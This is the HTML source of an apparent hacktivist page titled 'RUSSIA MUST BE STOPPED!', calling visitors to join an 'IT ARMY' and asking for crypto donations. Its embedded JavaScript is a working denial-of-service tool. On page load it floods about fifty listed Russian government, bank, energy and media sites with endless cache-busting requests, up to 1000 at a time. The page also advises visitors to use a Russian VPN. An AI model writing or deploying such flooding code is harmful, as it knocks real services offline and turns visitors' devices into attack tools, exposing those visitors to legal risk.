
<html>
<head>
   <meta charset="utf-8">
   <title>RUSSIA MUST BE STOPPED!</title>
   <style>
      html, body, div, span, applet, object, iframe,
      h1, h2, h3, h4, h5, h6, p, blockquote, pre,
      a, abbr, acronym, address, big, cite, code,
      del, dfn, em, img, ins, kbd, q, s, samp,
      small, strike, strong, sub, sup, tt, var,
      b, u, i, center,
      dl, dt, dd, ol, ul, li,
      fieldset, form, label, legend,
      table, caption, tbody, tfoot, thead, tr, th, td,
      article, aside, canvas, details, embed, 
      figure, figcaption, footer, header, hgroup, 
      menu, nav, output, ruby, section, summary,
      time, mark, audio, video {
         margin: 0;
         padding: 0;
         border: 0;
         font-size: 100%;
         font: inherit;
         vertical-align: baseline;
      }
      * {
         box-sizing: border-box;
      }
      article, aside, details, figcaption, figure, 
      footer, header, hgroup, menu, nav, section {
         display: block;
      }
      body {
         line-height: 1;
      }
      ol, ul {
         list-style: none;
      }
      blockquote, q {
         quotes: none;
      }
      blockquote:before, blockquote:after,
      q:before, q:after {
         content: '';
         content: none;
      }
      table {
         border-collapse: collapse;
         border-spacing: 0;
      }
      body {
         font-family: Arial, Helvetica, sans-serif;
      }

      .wrap {
         width: 100%;
         max-width: 1980px;
         margin: 0 auto;
      }
      #first {
         position: relative;
         background: #6666ff;
         text-align: center;
         height: 30vh;
         padding: 20px;
      }
      #first .lang {
         position: absolute;
         top: 10px;
         right: 10px;
         color: #fff;
         text-decoration: none;
      }
      #first .lang img {
         display: inline-block;
         border: 1px solid #fff;
         margin: 0 2px -3px 0;
      }
      #first h1 {
         display: block;
         position: absolute;
         top: 50%;
         width: 100%;
         -webkit-transform: translateY(-50%);
         transform: translateY(-50%);
         color: #fff;
         font-size: 36px;
         line-height: 40px;
         font-weight: bold;
      }

      #main {
         background: #ffff66;
         text-align: center;
         min-height: 30vh;
         padding: 20px;
      }
      #main h2 {
         font-size: 24px;
         line-height: 30px;
         font-weight: bold;
      }
      #main p:not(.first) {
         display: none;
      }
      .full #main p:not(.first) {
         display: block;
      }
      #main .info {
         margin: 10px 0;
         font-weight: bold;
         padding: 10px;
         border: 1px solid #000;
         display: inline-block;
      }
      #main .info:before,
      #main .info:after {
         content: ' !!! ';
         display: inline;
         font-weight: bold;
         color: red;
      }
      #main p {
         margin: 20px 0;
      }
      #main .show-more,
      #main .go-to {
         display: inline-block;
         font-size: 16px;
         line-height: 36px;
         background: #6666ff;
         color: #fff;
         border-radius: 5px;
         font-weight: bold;
         padding: 0 10px;
         margin: 0 5px;
         cursor: pointer;
      }
      #main .show-more:hover,
      #main .go-to:hover {
         background: #000;
      }
      .full #main .show-more {
         display: none;
      }
      #main .videos video {
         max-width: 100%;
      }
      .css_table {
        display: table;
        position: relative;
        width:100%;
      }
      .css_tr {
        display: table-row;
      }
      .css_tr:nth-child(even) .css_td {
        background: #f5f5f5;
      }
      .css_tr:nth-child(odd) .css_td {
        background: #fff;
      }
      .css_td,
      .css_th,
      .css_sd{
        display: table-cell;
        padding: 8px 10px;
        white-space:nowrap; 
        border-bottom: 0.2px solid #fff;
        border-right: 0.2px solid #fff;
      }
      .css_thead {
        display: table-header-group;
        font-weight: bold;
        z-index:1;
      }
      .css_tfoot {
        background-color: #eee;
        display: table-footer-group;
        font-weight: bold;
      }
      .css_tbody {
        display: table-row-group;
      }
      /*Table Header Fixed */
      .css_th, .css_sd{
        position: sticky;
        background-color: #202932;
        color: #fff;
      }
      .css_th{
        top: 0;
      }
      .css_sd{
        left: 0;
      }
      .css_thead div.css_th:first-child,
      .css_tfoot div.css_th:first-child{
        left:0;
        z-index:1;
      }
      .css_tfoot .css_th{
        bottom:0
      }
      /*Responsive Div Table*/
      @media screen and (max-width: 650px) {
        .css_table {
          border: 0;
        }
        .css_table .css_thead ,.css_table .css_tfoot{
          display: none;
        }
        .css_table .css_tr {
          margin-bottom: 10px;
          display: block;
          border-bottom: 2px solid #ddd;
        }
        .css_table .css_td ,.css_table .css_sd {
          display: block;
          text-align: right;
          font-size: 13px;
          border-bottom: 1px dotted #ccc;
          border-left: 1px solid #ddd;
        }
        .css_table .css_td:last-child {
          border-bottom: 0;
        }
        .css_table .css_td:before,.css_table .css_sd:before {
          content: attr(data-label);
          float: left;
          text-transform: uppercase;
          font-weight: bold;
        }
        .table_scroll{
          margin:0;
          height:auto!important;
        }
        .css_tr:nth-child(even) .css_td {
        background: #fff;
        }
      }
   </style>
</head>
<body>
   <section id="first">
      <div class="wrap">
         <h1>RUSSIA MUST BE STOPPED! Join IT ARMY of Ukraine</h1>
         <a class="lang" href="test.html">
            <img src="//notwar.ho.ua/flags-ua.png" alt="СЛАВА УКРАЇНІ!!!" width="30" height="20">
            Українська версія 
              (Ukrainian version)
         </a>
      </div>
   </section>
   <section id="main">
      <div class="wrap">
         <div class="info">With this tab open and active in your internet browser, your device is visiting tens of websites in Russia that are critical for the war effort.</div>
         <p class="first">STOP RUSSIAN INVASION IN UKRAINE! JOIN FORCES WITH THOUSANDS OF PEOPLE AROUND THE WORLD TO STAND WITH UKRAINIANS!</p>
         <p>Join the Ukrainians and Free People of the world to stop Russian invasion in Ukraine, and the onslaught of civilian people!<br>This is a simple step-by-step guide how YOU can help in slowing down Russian economy and its War Machine.</p>
         <p>With this tab open and active in your internet browser, your device is visiting tens of websites in Russia that are critical for the war effort.</p>
         <p>With thousands of other people around the world joining this good cause, these websites will crumble under our collective pressure.</p>
         <p>We advise to use VPN under the RU flag as many of these websites are not available in your country directly.</p>
         <p>Thank you for your support in helping Ukraine in a fight for the freedom and peace in Europe!</p>
         <p>We need resources for sustaining this portal, traffic acquisition, etc.</p>
		 <p><a href="https://how-to-help-ukraine-now.super.site/">How you can help Ukrainians?  </a> </p>
         <p>You can support our Cyber Army by donating in crypto to the following addresses:</p>
         <p class="wallets">
            BTC: bc1quajhdrlk62uk9s67mzuxnwh3x5g7vcmnwctnwa<br>
            ETH: 0x112c146389953006b45D8fa9a8F1238636C239AB<br>
            THETA: 0x4C2db2bBEeb62e1B11648e94BEB7e0aF3a432956<br>
            USDT / TRX: TS9RL35bN7YPAYBU7C76AfhikcpffHv2Sr
         </p>
         <p class="videos">
            <video width="400" height="300" controls="controls" poster="http://notwar.ho.ua/IMG_6265.MP4">
               <source src="http://notwar.ho.ua/IMG_6265.MP4" type='video/mp4; codecs="avc1.42E01E, mp4a.40.2"'>
               Тег video не поддерживается вашим браузером. 
               <a href="http://notwar.ho.ua/IMG_6265.MP4">Завантажити відео</a>.
            </video>
            <video width="400" height="300" controls="controls" poster="http://notwar.ho.ua/IMG_6383.MP4">
               <source src="http://notwar.ho.ua/IMG_6383.MP4" type='video/mp4; codecs="avc1.42E01E, mp4a.40.2"'>
               Тег video не поддерживается вашим браузером. 
               <a href="http://notwar.ho.ua/IMG_6383.MP4">Завантажити відео</a>.
            </video>
            <br>
            <video width="400" height="300" controls="controls" poster="http://notwar.ho.ua/IMG_6360.MP4">
               <source src="http://notwar.ho.ua/IMG_6360.MP4" type='video/mp4; codecs="avc1.42E01E, mp4a.40.2"'>
               Тег video не поддерживается вашим браузером. 
               <a href="http://notwar.ho.ua/IMG_6360.MP4">Завантажити відео</a>.
            </video>
            <video width="400" height="300" controls="controls" poster="http://notwar.ho.ua/IMG_6382.MP4">
               <source src="http://notwar.ho.ua/IMG_6382.MP4" type='video/mp4; codecs="avc1.42E01E, mp4a.40.2"'>
               Тег video не поддерживается вашим браузером. 
               <a href="http://notwar.ho.ua/IMG_6382.MP4">Завантажити відео</a>.
            </video>
<big><b><p id="checkOnline"><big> </big></p></b></big>
         </p>
         <a class="show-more">Show more...</a>
         <a class="go-to">Show stats</a>
      </div>
   </section>
   <section id="stats">
      <div class="wrap">
         <div class="css_table">
            <div class="css_thead">
               <div class="css_tr">
                  <div class="css_th">URL</div>
                  <div class="css_th">Number of Requests</div>
                  <div class="css_th">Number of Errors</div>
               </div>
            </div>
            <div id="stats_data" class="css_tbody"></div>
            <!--div class="css_tfoot">
               <div class="css_th">TOTAL</div>
               <div class="css_th">13560123</div>
               <div class="css_th">412409</div>
            </div-->
         </div>
      </div>
   </section>
   <script src="//notwar.ho.ua/jquery-3.6.0.min.js"></script>
   <script>
      $(".show-more").on("click", function() {
         $("body").addClass("full");
      });
      $(".go-to").click(function() {
          $([document.documentElement, document.body]).animate({
              scrollTop: $("#stats").offset().top
          }, 300);
      });
   </script>
   <!--LiveInternet counter--><a href="https://www.liveinternet.ru/click"
   target="_blank"><img id="licntF8CF" width="88" height="120" style="border:0" 
   title="LiveInternet: показано количество просмотров и посетителей"
   src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAEALAAAAAABAAEAAAIBTAA7"
   alt=""/></a><script>(function(d,s){d.getElementById("licntF8CF").src=
   "https://counter.yadro.ru/hit?t27.6;r"+escape(d.referrer)+
   ((typeof(s)=="undefined")?"":";s"+s.width+"*"+s.height+"*"+
   (s.colorDepth?s.colorDepth:s.pixelDepth))+";u"+escape(d.URL)+
   ";h"+escape(d.title.substring(0,150))+";"+Math.random()})
   (document,screen)</script><!--/LiveInternet-->

   <script>
   var targets = {
     'https://www.gazprom.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://lukoil.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://lukoil.ru/lenta/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://magnit.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://mail.rkn.gov.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
     'http://kremlin.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'http://en.kremlin.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://smotrim.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://cloud.rkn.gov.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://mvd.gov.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://pwd.wto.economy.gov.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://stroi.gov.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://www.vesti.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://online.sberbank.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://sberbank.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://zakupki.gov.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://www.gosuslugi.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://proverki.gov.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://www.rzd.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://rzdlog.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://vgtrk.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://www.interfax.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://www.mos.ru/uslugi/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'http://government.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://mil.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://www.nalog.gov.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://customs.gov.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://pfr.gov.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://rkn.gov.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://www.gazprombank.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://www.vtb.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://www.gazprom.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://lukoil.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://magnit.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://www.nornickel.com/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://www.surgutneftegas.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://www.tatneft.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://www.evraz.com/ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://nlmk.com/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://www.sibur.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://www.severstal.com/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://www.metalloinvest.com/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://nangs.org/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://rmk-group.ru/ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://www.tmk-group.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://ya.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://www.polymetalinternational.com/ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://www.uralkali.com/ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://www.eurosib.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://ugmk.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
     'https://omk.ru/': { number_of_requests: 0, number_of_errored_responses: 0 }, 
   }

   var statsEl = document.getElementById('stats_data');
   function printStats() {
     statsEl.innerHTML = Object.entries(targets).map(([target, { number_of_requests, number_of_errored_responses  }]) => '<div class="css_tr"><div class="css_sd">' + target + '</div><div class="css_td">' + number_of_requests + '</div><div class="css_td">' + number_of_errored_responses + '</div></div>').join('');
   }
   setInterval(printStats, 1000);

   var CONCURRENCY_LIMIT = 1000
   var queue = []

   async function fetchWithTimeout(resource, options) {
     const controller = new AbortController();
     const id = setTimeout(() => controller.abort(), options.timeout);
     return fetch(resource, {
       method: 'GET',
       mode: 'no-cors',
       signal: controller.signal
     }).then((response) => {
       clearTimeout(id);
       return response;
     }).catch((error) => {
       clearTimeout(id);
       throw error;
     });
   }

   async function flood(target) {
     for (var i = 0;; ++i) {
       if (queue.length > CONCURRENCY_LIMIT) {
         await queue.shift()
       }
       rand = i % 3 === 0 ? '' : ('?' + Math.random() * 1000)
       queue.push(
         fetchWithTimeout(target+rand, { timeout: 1000 })
           .catch((error) => {
             if (error.code === 20 /* ABORT */) {
               return;
             }
             targets[target].number_of_errored_responses++;
           })
           .then((response) => {
             if (response && !response.ok) {
               targets[target].number_of_errored_responses++;
             }
             targets[target].number_of_requests++;
           })

       )
     }
   }

   // Start
   Object.keys(targets).map(flood)
   </script>
<script>
function sayHi() {
online = window.navigator.onLine;
if(online==false) {alert("your connection is bad or you are not using a good VPN");
 alert("try changing your browser or VPN if your connection is good")}
}

setTimeout(sayHi, 5000);
</script>
    <p id="checkOnline"></p>
<script>  var ifConnected = window.navigator.onLine;
    if (ifConnected) {
      document.getElementById("checkOnline").innerHTML = "Online";
	  
      document.getElementById("checkOnline").style.color = "green";
	  
	  
    } else {
      document.getElementById("checkOnline").innerHTML = "Offline";
      document.getElementById("checkOnline").style.color = "red";
	alert("your connection is bad or you are not using a good VPN");
 alert("try changing your browser or VPN if your connection is good")
    }

setInterval(function(){ 

  var ifConnected = window.navigator.onLine;
    if (ifConnected) {
      document.getElementById("checkOnline").innerHTML = "Online";
      document.getElementById("checkOnline").style.color = "green";
    } else {
      document.getElementById("checkOnline").innerHTML = "Offline";
      document.getElementById("checkOnline").style.color = "red";
	  alert("your connection is bad or you are not using a good VPN");
 alert("try changing your browser or VPN if your connection is good")
    }

 }, 3000);
</script>
</body>
</html>
